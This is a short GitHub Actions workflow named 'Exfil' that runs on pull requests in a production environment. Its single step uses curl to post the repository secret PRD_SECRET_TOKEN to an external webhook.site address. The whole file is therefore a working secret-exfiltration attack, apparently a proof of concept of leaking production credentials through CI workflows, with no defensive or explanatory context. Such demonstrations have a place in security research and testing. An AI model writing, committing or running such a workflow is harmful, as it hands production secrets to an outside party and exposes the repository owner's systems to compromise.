name: Exfil
on: [pull_request]
jobs:
  exfil:
    environment: prd
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -d "${{ secrets.PRD_SECRET_TOKEN }}" https://webhook.site/ed9ea4c1-f8c4-4e76-8f10-59221b484c10
